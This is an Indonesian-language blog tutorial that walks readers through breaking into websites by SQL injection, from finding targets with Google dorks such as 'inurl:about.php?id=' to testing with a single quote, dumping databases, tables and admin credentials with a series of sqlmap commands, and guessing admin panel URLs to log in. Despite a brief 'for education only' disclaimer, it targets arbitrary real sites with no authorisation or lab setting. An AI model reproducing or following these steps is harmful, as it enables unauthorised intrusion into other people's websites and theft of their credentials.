*tutorial ini saya buat sepenuhnya dengan tujuan edukasi dan menambah ilmu, saya tidak bertanggung jawab bila tutorial ini disalah gunakan untuk kejahatan.
Pertama tama kalian memerlukan kali linux agar bisa mencobanya. untuk cara installnya bisa dicari di google.
- Cari dulu website yang akan dijadikan target, caranya gunakan google dork, google dork itu semacam kata kunci, buat kita kalo mau nyari halaman tertentu dalam suatu website. contoh :
- inurl:tenant.php?id=
- inurl:about.php?id=
- dan masih banyak lagi
2. Setelah ketemu websitenya cek dulu, apakah website itu bisa di hack atau tidak, caranya tambahkan tanda petik ( ' ) di akhir alamat website.
jika terlihat error seperti dibawah ini maka websitenya mungkin bisa di hack
nah, target sudah ketemu, saatnya eksekusi.
pertama buka terminal .
Lalu ketik command
sqlmap -u website target kalian --dbs
akan terlihat seperti diatas
jika ada dialog seperti dibawah isi saja n, lalu enter.
jika muncul lagi dialog seperti ini isikan y, lalu enter.
kemudian akan muncul dialog seperti ini, isikan n. lalu enter.
nah disini akan keliatan directory dari website tersebut. passwordnya bisa berada dimana saja, kalian baca dulu sampai habis, kalau sudah mengerti, nanti kalian telusuri saja directorynya satu persatu sampai passwordnya ketemu, kalo ga ketemu, berarti kalian kurang beruntung.
selanjutnya ketik command berikut
sqlmap -u website target kalian -D directory yg kalian pilih --tables
kira kira akan terlihat seperti diatas
kemudian akan keliatan table nya, ciri ciri table yang ada password admin didalamnya biasanya bernama admin,administrator,user, dan semacamnya.
lalu ketikan command
sqlmap -u website target kalian -D directory yg kalian pilih -T table yang kalian pilih --columns
nah, tinggal beberapa langkah lagi kita udah dapet password beserta username adminnya.
ketikkan lagi command
sqlmap -u website target kalian -D directory yg kalian pilih -T table yang kalian pilih -C password --dump
akan muncul beberapa dialog isi semuanya dengan y , y , 1 , y berurutan. lihat gambar
setelah itu akan di dapat password adminnya, yaitu " admin "
nah sekarang kita cari username nya karena percuma punya password tapi ga tau username. caranya hampir sama tapi columnnya berbeda
ketik command
sqlmap -u website target kalian -D directory yg kalian pilih -T table yang kalian pilih -C username --dump
nah sudah di dapat username dan passwordnya yaitu
username: admin
password: admin
nah untuk masuk ke admin panelnya kalian bisa coba tambahnkan kalimat ini dibelakang alamat website
website.co.id/login.php
website.co.id/admin.php
website.co.id/administrator.php
kalau kalian tidak bisa menemukan admin panelnya maka username sama password ini ga akan berguna.
Sekian tutorial dari gua, sorry kalo ga jelas dan kalo ada banyak kesalahan. gua juga masih belajar mendalami dunia komputer. kalo masih belum ngerti coba diperhatiin lagi step - step nya.
* tulisan yang berwarna merah bisa kalian rubah jika perlu
No comments:
Post a Comment